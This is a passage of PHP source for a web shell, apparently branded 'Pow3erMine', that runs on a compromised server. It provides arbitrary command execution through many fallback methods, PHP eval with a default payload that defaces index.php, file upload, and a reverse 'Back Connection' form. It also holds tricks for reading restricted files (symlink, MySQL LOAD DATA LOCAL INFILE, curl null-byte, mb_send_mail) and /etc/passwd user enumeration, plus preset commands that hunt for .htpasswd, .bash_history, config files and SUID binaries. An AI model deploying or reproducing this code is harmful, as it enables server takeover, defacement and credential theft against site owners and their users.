1536. <td style="background-color:#666;padding-left:10px;">Edit File
1537. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
1538. </tr>
1539. <tr>
1540. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
1541. </tr>
1542. </table>
1543. </form>
1544. <!-- End Of Command Line-->
1545.  
1546. </td>
1547. <td width='30%' height='30'>
1548. <!-- Command Line -->
1549. <form method='POST' enctype="multipart/form-data">
1550. <table height='72' border='0' id='Box'>
1551. <tr>
1552. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
1553. <td style="background-color:#666;padding-left:10px;">Command Line
1554. <?php echo print_exe_method(); ?>
1555. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
1556. </td>
1557. </tr>
1558. <tr>
1559. <td height="45" colspan="2">
1560. <?php echo SelectCommand($os); ?>
1561. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
1562. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
1563. </tr>
1564. </table>
1565. </form>
1566. <!-- End Of Command Line-->
1567. </td>
1568. <td width='30%' height='30' valign="top">
1569. <!-- Commands Alias-->
1570. <form method='POST' enctype="multipart/form-data">
1571. <table width='100%' height='72' border='0' id='Box'>
1572. <tr>
1573. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
1574. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
1575. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
1576. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
1577. </span></td>
1578. </tr>
1579. <tr>
1580. <td height="45" colspan="2">
1581. <input type='file' name='uploadfile[]'>
1582. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
1583. </tr>
1584. </table>
1585. </form>
1586. <!-- End Of Commands Alias-->
1587. </td>
1588. </tr>
1589. <tr valign="top">
1590. <td width='30%'>
1591. <!-- Commands Alias-->
1592. <form method='POST' enctype="multipart/form-data">
1593. <table width='100%' height='72' border='0' id='Box'>
1594. <tr>
1595. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
1596. <td style="background-color:#666;padding-left:10px;">PHP Eval
1597. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
1598. </tr>
1599. <tr>
1600. <td height="45" colspan="2"><label for="PHP_Line"></label>
1601. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
1602. fwrite($file,"Hacked");
1603. fclose($file);';}
1604. ?>
1605. </textarea>
1606. <br></td>
1607. </tr>
1608. </table>
1609. </form>
1610. <!-- End Of Commands Alias-->
1611. </td>
1612. <td width='30%' height='30'>
1613. <!-- Commands Alias-->
1614. <form method='POST' enctype="multipart/form-data">
1615. <table width='100%' height='72' border='0' id='Box'>
1616. <tr>
1617. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
1618. <td style="background-color:#666;padding-left:10px;">Read Files
1619.  
1620. <select name="READ_Type" >
1621. <option value="file" >file</option>
1622. <option value="fgets" >fgets</option>
1623. <option value="fgetss" >fgetss</option>
1624. <option value="readfile" >readfile</option>
1625. <option value="fread" >fread</option>
1626. <option value="show_source" >show_source</option>
1627. <option value="file_get_contents" >file_get_contents</option>
1628. <option value="tempnam" >tempnam</option>
1629. <option value="copy" >copy</option>
1630. <option value="symlink" >Symlink</option>
1631. <option value="mb_send_mail" >mb_send_mail</option>
1632. <option value="highlight_file" >highlight_file</option>
1633. <option value="curl" >Curl</option>
1634. <option value="imap" >Imap</option>
1635. <option value="mysql" >MySQL</option>
1636. <option value="mysqli" >MySQLI</option>
1637. <option value="ioncube">Ion Cube</option>
1638. <option value="error_log">Error_Log</option>
1639. <option value="include">Include</option>
1640. <option value="id" >ID /etc/passwd</option>
1641. </select>
1642. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
1643. </tr>
1644. <tr>
1645. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
1646. </tr>
1647. </table>
1648. </form>
1649. <!-- End Of Commands Alias-->
1650. </td>
1651. <td width='30%' height='30' valign="top">
1652. <!-- Commands Alias-->
1653. <form method='POST' enctype="multipart/form-data">
1654. <table width='100%' height='72' border='0' id='Box'>
1655. <tr>
1656. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
1657. <td style="background-color:#666;padding-left:10px;">Back Connection
1658. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
1659. </tr>
1660. <tr>
1661. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
1662. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
1663. <select name="CON_Type" >
1664. <option value="socks">SOCKS</option>
1665. <option value="fsockopen">FSOCKOPEN</option>
1666. </select>
1667. </td>
1668. </tr>
1669. </table>
1670. </form>
1671. <!-- End Of Commands Alias-->
1672. </td>
1673. </tr>
1674. </table>
1675. <?php
1676. function IncludeReader($path) {
1677. global $os;
1678. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
1679. $fileName = substr(strrchr($path,$slash),1);
1680. $includePath = substr($path,0,strpos($path,$fileName,0));
1681. ini_set("include_path",$includePath);
1682. include($fileName);
1683. }
1684. function GetUsers1() {
1685. return Exe('ls /var/mail');
1686. }
1687. function GetUsers2() {
1688. $array = array();
1689. $lines = file("/etc/passwd");
1690. foreach($lines as $nr=>$val) {
1691. $str = explode(":",$val);
1692. array_push($array,$str[0]);
1693. }
1694. return $array;
1695. }
1696. function GetUsers3() {
1697. $array = array();
1698. if ($dh = opendir("/home/")) {
1699. while (($file = readdir($dh)) !== false) {
1700. array_push($array,$file);
1701. }
1702. closedir($dh);
1703. return $array;
1704. }
1705. }
1706. function GetUsers4() {
1707. $dir = "/home/";
1708. $array = array();
1709. if ($dh = opendir($dir)) {
1710. $f = readdir($dh);
1711. while (($f = readdir($dh)) !== false) {
1712. $dh2=opendir($dir."/");
1713. $f2 = readdir($dh2);
1714. while (($f2 = readdir($dh2)) !== false) {
1715. $f2.="/";
1716. $dh3=opendir($dir.$f.$f2);
1717. $f3 = readdir($dh3);
1718. while (($f3 = readdir($dh3)) !== false) {
1719. array_push($array,$f3);
1720. }
1721. }
1722. }
1723. closedir($dh);
1724. return $array;
1725. }
1726. }
1727. function GetUsers5(){
1728. return realpath('/etc/passwd');
1729. }
1730. function ErrorLog($path){
1731. $tempFile = uniqid();
1732. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
1733. error_log(file_get_contents($path), 3, $tempFile);
1734. $content = file_get_contents($tempFile);
1735. unlink($tempFile);
1736. return $content;
1737. }
1738. function SymlinkF($path) {
1739. $tempFile = uniqid();
1740. if(function_exists('symlink')) {
1741. symlink($path,$tempFile);
1742. $content = file_get_contents($tempFile);
1743. unlink($tempFile);
1744. return $content;
1745. }
1746. }
1747. function MySQLReader($path) {
1748. global $DBhost,$DBuser,$DBpass;
1749. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
1750. $con = mysql_connect($DBhost,$DBuser,$DBpass);
1751. mysql_query("CREATE DATABASE a");
1752. mysql_query("CREATE TABLE a.a (a varchar(1024))");
1753. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
1754. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
1755. $result = mysql_query("SELECT a FROM a.a");
1756. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
1757. mysql_query("DROP DATABASE a");
1758. }
1759. function MySQLIReader($path) {
1760. global $DBhost,$DBuser,$DBpass;
1761. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
1762. $con = mysql_connect($DBhost,$DBuser,$DBpass);
1763. mysql_query("CREATE DATABASE a");
1764. mysql_query("CREATE TABLE a.a (a varchar(1024))");
1765.  
1766. function r($fp, &$buf, $len, &$err) {
1767. print fread($fp, $len);
1768. }
1769. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
1770. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
1771. $m->set_local_infile_handler("r");
1772. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
1773. $m->close();
1774. }
1775. function DBConnect($host,$user,$pass,$db) {
1776. $connect = mysql_pconnect($host,$user,$pass);
1777. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
1778. else {
1779. $tryToSelectDB = mysql_select_db($db,$connect);
1780. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
1781. else{return true; return $connect;}
1782. }
1783. }
1784. function ReadId($path) {
1785. for($uid=0;$uid<60000;$uid++) {
1786. $ara = posix_getpwuid($uid);
1787. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
1788. }
1789. }
1790. return $content;
1791. }
1792. function ImapF($path) {
1793. $stream = imap_open($path, "", "");
1794. $str = imap_body($stream, 1);
1795. imap_close($stream);
1796. return $str;
1797. }
1798. function FileF($path) {
1799. $lines = file($path); foreach($lines as $line){$content .= $line;}
1800. return $content;
1801. }
1802. function CopyF($path) {
1803. $tempFile = md5(uniqid()).".bb";
1804. copy($path,$tempFile);
1805. $content = file_get_contents($tempFile);
1806. unlink($tempFile);
1807. return $content;
1808. }
1809. function fgetssF($path) {
1810. while(($line = fgetss($path)) != false){$content .= $line;}
1811. return $content;
1812. }
1813. function highlightFile($path) {
1814. return highlight_file($path);
1815. }
1816. function mbSendEmail($path) {
1817. if(function_exists('mb_send_mail')) {
1818. $tempFile = uniqid();
1819. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
1820. mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
1821. $content = file_get_contents($tempFile);
1822. unlink($tempFile);
1823. return $content;
1824. }
1825. }
1826. function DeleteFile($fileName) {
1827. global $os;
1828. if(function_exists('unlink'))
1829. {$delete = unlink($fileName);}
1830. if((!$delete) && ($os == 'Windows'))
1831. {$delete = Exe("del $fileName"); }
1832. else if((!$delete) && ($os == 'Linux'))
1833. {$delete = Exe("rm -f $fileName");}
1834. if($delete){return true;}else{return false;}
1835. }
1836. function CurlFileRead($path) {
1837. $ch = curl_init("file://".$path."\x00".__FILE__);
1838. var_dump(curl_exec($ch));
1839. }
1840. function FReadF($path) {
1841. $file = fopen($path,'r+'); //Open The File
1842. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
1843. fclose($file);
1844. }
1845. function TempnameF($path) {
1846. global $dir;
1847. $temp = tempnam($dir, "cx");
1848. if(copy("compress.zlib://".$path, $temp)) {
1849. $handler = fopen($temp, "r");
1850. $readFile = fread($handler, @filesize($temp));
1851. fclose($handler);
1852. $content .= htmlspecialchars($filename);
1853. $content .= nl2br(htmlspecialchars($readFile));
1854. $content .= htmlspecialchars($filename);
1855. unlink($temp);
1856. return $content;
1857. }
1858. }
1859. function Evaluation($eval) {
1860. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
1861. $eval = eval($eval);
1862. if($eval){return true;}else{return false;}
1863. }
1864. function Oracle() {
1865. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
1866. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
1867. }
1868. function MsSQL() {
1869. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
1870. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
1871. }
1872. function MySQL2() {
1873. $mysql_try = function_exists('mysql_connect');
1874. if($mysql_try){$mysql = '<font color="red">ON</font>';}
1875. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
1876. }
1877. function MSQL() {
1878. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
1879. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
1880. }
1881. function MysqlI() {
1882. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
1883. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
1884. }
1885. function Gzip() {
1886. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
1887. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
1888. }
1889. function openBaseDir() {
1890. $openBaseDir = ini_get("open_basedir");
1891. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
1892. else {$openBaseDir = '<font color="red">ON</font>';}
1893. return $openBaseDir;
1894. }
1895. function Curl() {
1896. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
1897. else{$curl = '<font color="green">OFF</font>';}return $curl;
1898. }
1899. function magicQouts() {
1900. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
1901. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
1902. else {$mag= '<font color="red">ON</font>';}return $mag;
1903. }
1904. function SafeMode() {
1905. $safe_mode = ini_get("safe_mode");
1906. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
1907. else {$safe_mode = '<font color="red">ON</font>';}
1908. return $safe_mode;
1909. }
1910. function DisableFunctions() {
1911. $disfun = ini_get('disable_functions');
1912. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
1913. }
1914. function RegisterGlobals() {
1915. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
1916. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
1917. }
1918. function GetRealIP() {
1919. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
1920. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
1921. else {$ip=getenv(REMOTE_ADDR);}
1922. return $ip;
1923. }
1924. function SelectCommand($os) {
1925. global $os;
1926. if($os == 'Windows') {
1927. echo "
1928. <select name='alias' id='alias' onChange='AddAlias();' >
1929. <option value=''>NONE</option>
1930. <option value='dir' >List Directory</option>
1931. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
1932. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
1933. <option value='netstat -an'>Show active connections</option>
1934. <option value='net start'>Show running services</option>
1935. <option value='tasklist'>Show Pro</option>
1936. <option value='net user'>User accounts</option>
1937. <option value='net view'>Show computers</option>
1938. <option value='arp -a'>ARP Table</option>
1939. <option value='ipconfig /all'>IP Configuration</option>
1940. <option value='netstat -an'>netstat -an</option>
1941. <option value='systeminfo'>System Informations</option>
1942. <option value='getmac'>Get Mac Address</option>
1943. </select>
1944. ";
1945. }
1946. else {
1947. echo "
1948. <select name='alias' id='alias' onChange='AddAlias();' >
1949. <option value=''>NONE</option>
1950. <option value='ls -la'>List dir</option>
1951. <option value='cat /etc/hosts'>IP Addresses</option>
1952. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
1953. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
1954. <option value='netstat -an | grep -i listen'>show opened ports</option>
1955. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
1956. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
1957. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
1958. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
1959. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
1960. <option value='find / -type f -name \"config*\"'>find config* files</option>
1961. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
1962. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
1963. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
1964. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
1965. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
1966. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
1967. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
1968. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
1969. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
1970. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
1971. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
1972. <option value='locate httpd.conf'>locate httpd.conf files</option>
1973. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
1974. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
1975. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
1976. <option value='locate my.conf'>locate my.conf files</option>
1977. <option value='locate admin.php'>locate admin.php files</option>
1978. <option value='locate cfg.php'>locate cfg.php files</option>
1979. <option value='locate conf.php'>locate conf.php files</option>
1980. <option value='locate config.dat'>locate config.dat files</option>
1981. <option value='locate config.php'>locate config.php files</option>
1982. <option value='locate config.inc'>locate config.inc files</option>
1983. <option value='locate config.inc.php'>locate config.inc.php</option>
1984. <option value='locate config.default.php'>locate config.default.php files</option>
1985. <option value='locate config'>locate config* files </option>
1986. <option value='locate \".conf\"'>locate .conf files</option>
1987. <option value='locate \".pwd\"'>locate .pwd files</option>
1988. <option value='locate \".sql\"'>locate .sql files</option>
1989. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
1990. <option value='locate \".bash_history\"'>locate .bash_history files</option>
1991. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
1992. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
1993. <option value='locate backup'>locate backup files</option>
1994. <option value='locate dump'>locate dump files</option>
1995. <option value='locate priv'>locate priv files</option>
1996. </select>
1997. ";
1998. }
1999. }
2000. function CSS($sh3llColor) {
2001. $css = "
2002. <style>
2003. BODY
2004. {
2005. FONT-FAMILY: Verdana;
2006. margin: 2;
2007. background-color: #000000;
2008. color:white;
2009. font-size:10pt;
2010. }
2011. sy
2012. {
2013. color:".$sh3llColor.";
2014. font-size:7pt;
2015. }
2016. #Box
2017. {
2018. color:".$sh3llColor.";
2019. background-color:#000;
2020. font-size:14px;
2021. font-weight:bold;
2022.  
2023. border:none;
2024. }
2025. table
2026. {
2027. border:none;
2028. BORDER: #eeeeee outset;
2029. BACKGROUND-COLOR: #000000;
2030. color: #cccccc;
2031. font-size:10px;
2032. }
2033. tr
2034. {
2035. BORDER-RIGHT: #cccccc 1px solid;
2036. BORDER-TOP: #cccccc 1px solid;
2037. BORDER-LEFT: #cccccc 1px solid;
2038. BORDER-BOTTOM: #cccccc 1px solid;
2039. color: #ffffff;
2040. }
2041. td
2042. {
2043. BORDER-RIGHT: #cccccc 1px solid;
2044. BORDER-TOP: #cccccc 1px solid;
2045. BORDER-LEFT: #cccccc 1px solid;
2046. BORDER-BOTTOM: #cccccc 1px solid;
2047. color: #cccccc;
2048. }
2049.  
2050. input
2051. {
2052. BORDER-RIGHT: ".$sh3llColor." 1px solid;
2053. BORDER-TOP: ".$sh3llColor." 1px solid;
2054. BORDER-LEFT: ".$sh3llColor." 1px solid;
2055. BORDER-BOTTOM: ".$sh3llColor." 1px solid;
2056. BACKGROUND-COLOR: #333333;
2057. font: 9pt tahoma;
2058. color: #ffffff;
2059. }
2060. select
2061. {
2062. BORDER-RIGHT: #ffffff 1px solid;
2063. BORDER-TOP: #999999 1px solid;
2064. BORDER-LEFT: #999999 1px solid;
2065. BORDER-BOTTOM: #ffffff 1px solid;
2066. BACKGROUND-COLOR: #000000;
2067. font: 9pt tahoma;
2068. color: #CCCCCC;;
2069. }
2070. submit
2071. {
2072. BORDER: 1px outset buttonhighlight;
2073. BACKGROUND-COLOR: #272727;
2074. width: 40%;
2075. color: #cccccc;
2076. }
2077. textarea
2078. {
2079. BORDER-RIGHT: #ffffff 1px solid;
2080. BORDER-TOP: #999999 1px solid;
2081. BORDER-LEFT: #999999 1px solid;
2082. BORDER-BOTTOM: #ffffff 1px solid;
2083. BACKGROUND-COLOR: #333333;
2084. color: #ffffff;
2085. }
2086. .Save{
2087. width:500px;
2088. border-color:red;
2089. }
2090. A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
2091. A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
2092. A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
2093. A:hover {color:blue;TEXT-DECORATION: none;}
2094. </style>
2095. <script>
2096. function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
2097. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
2098. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
2099. function change_dir_mode() {
2100. var dir_mode = document.getElementById('dir_mode').value;
2101. document.location = '?dir_mode='+dir_mode;
2102. }
2103. </script>
2104. ";
2105. return $css;
2106. }
2107. function filter($string) {
2108. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
2109. else{return $string; }
2110. }
2111. function footer() {
2112. echo '
2113. <table width="100%">
2114. <tr>
2115. <td width="100%"><center>
2116. <sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>
2117.  
2118. <sy> ? </sy>Skype: Pow3rMine | Email: onlinestresser@gmail.com<sy> ?</sy></b>
2119. </center></td>
2120. </tr>
2121. </table>
2122. </body></html>
2123. ';
2124. }
2125. function print_exe_method() {
2126. global $os; global $exec_method;
2127. if($os == "Linux") {
2128. ?>
2129. <select name="exe_method" >
2130. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
2131. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
2132. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
2133. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
2134. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
2135. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
2136. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
2137. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
2138. </select>
2139. <?php
2140. } else {
2141. ?>
2142. <select name="exe_method" >
2143. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
2144. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
2145. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
2146. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
2147. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
2148. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
2149. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
2150. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
2151. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
2152. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
2153. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
2154. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
2155. </select>
2156. <?php
2157. }
2158. }
2159. function Exe($command) {
2160. global $dir;global $os;global $exec_method;
2161. $command = filter($command);
2162.  
2163. if($exec_method == "exec") {
2164. exec($command,$output);echo join("\n",$output);
2165. } else if($exec_method == "system") {
2166. system($command);
2167. } else if($exec_method == "shell_exec") {
2168. echo shell_exec($command);
2169. } else if($exec_method == "passthru") {
2170. passthru($command);
2171. } else if($exec_method == "proc_open") {
2172. echo proc_exec($command,$dir);
2173. } else if($exec_method == "popen") {
2174. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
2175. } else if($exec_method == "win_shell_execute") {
2176. echo winshell($command);
2177. } else if($exec_method == "win32_create_service") {
2178. echo srvshell($command);
2179. } else if($exec_method == "ffi") {
2180. echo ffishell($command);
2181. } else if($exec_method == "perl") {
2182. echo perlshell($command);
2183. } else if($exec_method == "python") {
2184. echo python_eval("import os\nos.system('".$command."')");
2185. } else if($exec_method == "slash_bypass") {
2186. echo slashBypass($command);
2187. }
2188. }
2189. function proc_exec($com , $dir) {
2190. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
2191. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
2192. return stream_get_contents($pipes[1]);
2193. }
2194. function winshell($command) {
2195. $name=whereistmP()."\\".uniqid('NJ');
2196. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
2197. sleep(1);
2198. $exec=file_get_contents($name);
2199. DeleteFile($name);
2200. return $exec;
2201. }
2202. function srvshell($command) {
2203. $name=whereistmP()."\\".uniqid('NJ');
2204. $n=uniqid('NJ');
2205. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
2206. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
2207. win32_start_service($n);
2208. win32_stop_service($n);
2209. win32_delete_service($n);
2210. while(!file_exists($name))sleep(1);
2211. $exec=file_get_contents($name);
2212. DeleteFile($name);
2213. return $exec;
2214. }
2215. function ffishell($command) {
2216. $name=whereistmP()."\\".uniqid('NJ');
2217. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
2218. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
2219. while(!file_exists($name))sleep(1);
2220. $exec=file_get_contents($name);
2221. DeleteFile($name);
2222. return $exec;
2223. }
2224. function perlshell($command) {
2225. $perl=new perl();
2226. ob_start();
2227. $perl->eval("system('".$command."')");
2228. $exec=ob_get_contents();
2229. ob_end_clean();
2230. return $exec;
2231. }
2232. function slashBypass($cmd) {
2233. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
2234. exec("\start cmd.bat");
2235. $content = file_get_contents('sy3.txt');
2236. unlink('sy3.txt');
2237. return $content;
2238. }
2239. function GenerateFile($name,$content) {
2240. if(function_exists('fopen') && function_exists('fclose')) {
2241. $file = fopen($name,"w+");
2242. if($file) {
2243. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
2244. else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
2245. else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
2246. if(!$writeFile){return false;}
2247. }
2248. else{return false;}fclose($file);return true;
2249. }
2250. }
2251. function ScanDirs() {
2252. global $os; global $dir;global $safeMode;global $dir_mode;
2253. if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
2254. else {
2255. $result .= "Perms Size Time Owner/Group R/W Type File
2256. -----------------------------------------------------------------------------
2257. ";
2258. $handel = opendir($dir);
2259. while(($file = readdir($handel))!= false)
2260. {
2261. $size = filesize($file);
2262. if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
2263. if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
2264. if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
2265. $perms = fileperms($file);
2266. $time = date("y/m/d", filectime($file));
2267. if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
2268. if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
2269. $result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
2270. ";
2271. }
2272. }
2273. return $result;
2274. }
2275. echo footer();
2276. ?>